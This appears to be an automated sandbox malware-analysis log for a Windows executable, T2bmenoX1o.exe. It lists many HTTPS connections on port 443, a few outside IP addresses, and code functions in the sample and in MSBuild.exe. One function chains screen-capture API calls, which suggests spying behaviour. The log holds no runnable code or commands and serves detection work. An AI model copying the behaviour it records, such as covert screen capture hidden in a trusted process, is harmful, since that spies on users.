Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51395
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51396
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51399
Source: unknown Network traffic detected: HTTP traffic on port 51347 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51371 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51404 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51438 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51486 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51566 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51325 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51450 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51543 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51393 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51295
Source: unknown Network traffic detected: HTTP traffic on port 51348 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51370 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51405 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51518 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51416 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51359 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51529 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51299
Source: unknown Network traffic detected: HTTP traffic on port 51427 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51475 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51314 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51461 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51532 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51381 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51348
Source: unknown Network traffic detected: HTTP traffic on port 51417 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51469
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51349
Source: unknown Network traffic detected: HTTP traffic on port 51484 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51342
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51463
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51343
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51464
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51340
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51461
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51341
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51462
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51346
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51467
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51347
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51468
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51344
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51465
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51345
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51466
Source: unknown Network traffic detected: HTTP traffic on port 51369 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51323 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51470
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51350
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51471
Source: unknown Network traffic detected: HTTP traffic on port 51346 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51357 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51441 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51359
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51353
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51474
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51354
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51475
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51351
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51472
Source: unknown Network traffic detected: HTTP traffic on port 51506 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51352
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51473
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51357
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51478
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51358
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51479
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51355
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51476
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51356
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51477
Source: unknown Network traffic detected: HTTP traffic on port 51544 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51452 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51392 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51429 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51360
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51481
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51361
Source: unknown Network traffic detected: HTTP traffic on port 51473 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51482
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51480
Source: unknown Network traffic detected: HTTP traffic on port 51517 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51312 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51555 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51440 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51358 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51463 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51335 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51364
Source: unknown Network traffic detected: HTTP traffic on port 51302 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51485
Source: unknown Network traffic detected: HTTP traffic on port 51505 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51365
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51486
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51362
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51483
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51363
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51484
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51368
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51489
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51369
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51366
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51487
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51367
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51488
Source: unknown Network traffic detected: HTTP traffic on port 51528 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51428 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51371
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51492
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51372
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51493
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51490
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51370
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51491
Source: unknown Network traffic detected: HTTP traffic on port 51533 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51556 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51380 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51485 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51375
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51496
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51376
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51497
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51373
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51494
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51374
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51495
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51379
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51377
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51498
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51378
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51499
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51382
Source: unknown Network traffic detected: HTTP traffic on port 51324 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51383
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51380
Source: unknown Network traffic detected: HTTP traffic on port 51496 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51381
Source: unknown Network traffic detected: HTTP traffic on port 51406 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51356 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51333 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51379 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51310 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51522 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51459 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51494 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51471 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51436 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51413 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51391 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51539 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51309 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51540 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51322 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51368 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51551 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51425 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51509 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51367 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51510 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51483 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51495 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51447 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51311 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51424 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:51295 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:51299 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:51376 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00411F2A CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 1_2_00411F2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040145B GetCurrentProcess,NtQueryInformationProcess, 1_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB7ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 1_2_6CB7ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBBB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 1_2_6CBBB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBBB8C0 rand_s,NtQueryVirtualMemory, 1_2_6CBBB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBBB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 1_2_6CBBB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 1_2_6CB5F280
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB2021 0_2_00DB2021
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB729C 0_2_00DB729C
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0A22B 0_2_00E0A22B
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DFE3DF 0_2_00DFE3DF
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DCD39B 0_2_00DCD39B
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DF94DB 0_2_00DF94DB
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0A5C9 0_2_00E0A5C9
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DF6570 0_2_00DF6570
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DF877B 0_2_00DF877B
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DC572C 0_2_00DC572C
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0A99B 0_2_00E0A99B
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DBCAF2 0_2_00DBCAF2
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DCBB36 0_2_00DCBB36
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DC3C92 0_2_00DC3C92
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0AD83 0_2_00E0AD83
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E09D96 0_2_00E09D96
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB1D79 0_2_00DB1D79
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DBFEF0 0_2_00DBFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041C603 1_2_0041C603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041B8A3 1_2_0041B8A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042DAC3 1_2_0042DAC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042D353 1_2_0042D353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042D6F1 1_2_0042D6F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00419698 1_2_00419698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042DEAB 1_2_0042DEAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042CEBE 1_2_0042CEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB535A0 1_2_6CB535A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBB34A0 1_2_6CBB34A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBBC4A0 1_2_6CBBC4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB66C80 1_2_6CB66C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB96CF0 1_2_6CB96CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5D4E0 1_2_6CB5D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB7D4D0 1_2_6CB7D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB664C0 1_2_6CB664C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBC542B 1_2_6CBC542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB95C10 1_2_6CB95C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBA2C10 1_2_6CBA2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBCAC00 1_2_6CBCAC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBC545C 1_2_6CBC545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB65440 1_2_6CB65440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBB85F0 1_2_6CBB85F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB90DD0 1_2_6CB90DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB7ED10 1_2_6CB7ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB80512 1_2_6CB80512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB6FD00 1_2_6CB6FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBB4EA0 1_2_6CBB4EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB75E90 1_2_6CB75E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBBE680 1_2_6CBBE680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5BEF0 1_2_6CB5BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB6FEF0 1_2_6CB6FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBC76E3 1_2_6CBC76E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBB9E30 1_2_6CBB9E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB97E10 1_2_6CB97E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBA5600 1_2_6CBA5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5C670 1_2_6CB5C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBC6E63 1_2_6CBC6E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB79E50 1_2_6CB79E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB93E50 1_2_6CB93E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBA2E4E 1_2_6CBA2E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB74640 1_2_6CB74640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBA77A0 1_2_6CBA77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB86FF0 1_2_6CB86FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5DFE0 1_2_6CB5DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB97710 1_2_6CB97710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB69F00 1_2_6CB69F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB860A0 1_2_6CB860A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB7C0E0 1_2_6CB7C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB958E0 1_2_6CB958E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBC50C7 1_2_6CBC50C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB9B820 1_2_6CB9B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBA4820 1_2_6CBA4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB67810 1_2_6CB67810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB9F070 1_2_6CB9F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB78850 1_2_6CB78850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB7D850 1_2_6CB7D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB8D9B0 1_2_6CB8D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5C9A0 1_2_6CB5C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB95190 1_2_6CB95190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBB2990 1_2_6CBB2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBAB970 1_2_6CBAB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBCB170 1_2_6CBCB170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB6D960 1_2_6CB6D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB7A940 1_2_6CB7A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB6CAB0 1_2_6CB6CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBC2AB0 1_2_6CBC2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB522A0 1_2_6CB522A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB84AA0 1_2_6CB84AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBCBA90 1_2_6CBCBA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB71AF0 1_2_6CB71AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB9E2F0 1_2_6CB9E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB98AC0 1_2_6CB98AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB99A60 1_2_6CB99A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5F380 1_2_6CB5F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBC53C8 1_2_6CBC53C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB9D320 1_2_6CB9D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB6C370 1_2_6CB6C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB55340 1_2_6CB55340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC5ECD0 1_2_6CC5ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBFECC0 1_2_6CBFECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC0AC60 1_2_6CC0AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCC6C00 1_2_6CCC6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCDAC30 1_2_6CCDAC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD8CDC0 1_2_6CD8CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC96D90 1_2_6CC96D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC04DB0 1_2_6CC04DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD2AD50 1_2_6CD2AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCCED70 1_2_6CCCED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD88D20 1_2_6CD88D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC0AEC0 1_2_6CC0AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCA0EC0 1_2_6CCA0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC86E90 1_2_6CC86E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC9EE70 1_2_6CC9EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCE0E20 1_2_6CCE0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC00FE0 1_2_6CC00FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCDEFF0 1_2_6CCDEFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD48FB0 1_2_6CD48FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC0EFB0 1_2_6CC0EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC6EF40 1_2_6CC6EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCC2F70 1_2_6CCC2F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC06F10 1_2_6CC06F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD40F20 1_2_6CD40F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCEC8C0 1_2_6CCEC8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD068E0 1_2_6CD068E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD0E850 1_2_6CD0E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCD4840 1_2_6CCD4840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC50820 1_2_6CC50820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC8A820 1_2_6CC8A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD1C9E0 1_2_6CD1C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC349F0 1_2_6CC349F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC909A0 1_2_6CC909A0
